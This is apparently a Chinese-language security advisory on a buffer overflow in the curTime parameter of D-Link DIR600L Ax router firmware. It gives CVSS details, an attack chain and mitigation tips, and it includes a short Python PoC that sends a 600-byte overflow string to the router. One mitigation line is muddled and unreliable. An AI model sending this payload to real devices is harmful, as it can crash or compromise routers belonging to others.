CVE-2025-60561 D-Link DIR600L Ax缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-60561

漏洞类型

缓冲区溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR600L Ax (固件版本FW116WWb01)

漏洞概述

CVE-2025-60561是D-Link DIR600L Ax路由器固件中的一个高危缓冲区溢出漏洞。该漏洞存在于formSetEmail函数的curTime参数中，由于对用户输入缺乏充分的边界检查，当向该参数注入超长字符串时，会导致缓冲区溢出。攻击者可通过构造恶意HTTP请求触发此漏洞，无需任何认证即可远程利用。成功利用此漏洞可能导致路由器服务中断（拒绝服务），甚至可能在设备上执行任意代码，对网络基础设施安全构成严重威胁。此漏洞的CVSS评分为7.5，属于高危级别，影响路由器的可用性。鉴于D-Link DIR600L系列路由器在家庭和小型企业中的广泛应用，该漏洞可能影响大量终端用户。

技术细节

该漏洞是经典的栈缓冲区溢出问题。在D-Link DIR600L Ax路由器的Web管理界面中，formSetEmail函数负责处理邮件设置相关的请求。函数在处理curTime参数时，直接将用户提供的字符串复制到固定大小的缓冲区中，而未进行长度验证。当攻击者发送超长的curTime参数值时，超出缓冲区容量的数据会覆盖相邻的栈内存区域，包括返回地址和保存的寄存器值。通过精心构造溢出数据，攻击者可以控制程序执行流程，跳转到恶意代码执行。由于该漏洞存在于处理HTTP请求的过程中，且路由器Web服务通常以root权限运行，成功利用后可获得设备的完全控制权。攻击者可以利用此漏洞植入后门、窃取网络流量或将其纳入僵尸网络。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标D-Link DIR600L Ax路由器，获取其IP地址和Web管理界面访问地址

STEP 2

步骤2

构造恶意请求：攻击者构造包含超长字符串的HTTP POST请求，针对formSetEmail端点的curTime参数注入600字节以上的溢出数据

STEP 3

步骤3

发送漏洞利用载荷：通过网络向路由器Web服务发送恶意请求，由于无需认证，可直接触发formSetEmail函数中的缓冲区溢出

STEP 4

步骤4

溢出执行：超长字符串覆盖栈内存中的返回地址和关键寄存器，攻击者通过精确构造payload可劫持程序控制流

STEP 5

步骤5

达成攻击目标：实现远程代码执行，获得路由器完全控制权，可用于植入后门、流量窃取或组建僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # CVE-2025-60561 PoC - D-Link DIR600L Ax Buffer Overflow in formSetEmail # Target: D-Link DIR600L Ax with firmware FW116WWb01 # Vulnerability: Buffer overflow via curTime parameter in formSetEmail function target_ip = "192.168.0.1" # Default D-Link router IP target_url = f"http://{target_ip}/formSetEmail" # Generate overflow payload - 600 bytes to overflow the buffer # Adjust length based on actual vulnerable buffer size overflow_payload = "A" * 600 # Construct the malicious request data = { "curTime": overflow_payload, "emailEnable": "1", "emailAddr": "[email protected]" } try: print(f"[*] Sending exploit to {target_url}") print(f"[*] Payload length: {len(overflow_payload)} bytes") response = requests.post(target_url, data=data, timeout=10) print(f"[*] Response Status: {response.status_code}") print(f"[*] Exploit sent successfully") except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") # Note: This PoC triggers the vulnerability for testing purposes. # Successful exploitation may require precise payload crafting # to achieve code execution beyond simple DoS.

影响范围

D-Link DIR600L Ax 固件版本 FW116WWb01

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 关闭路由器的远程管理功能，仅通过本地连接访问Web管理界面；2) 修改默认管理端口并启用访问控制列表；3) 使用强密码保护管理账户；4) 监控设备日志，关注异常访问行为；5) 考虑使用VPN进行安全的远程管理；6) 如条件允许，可考虑更换为已停止支持的老旧设备。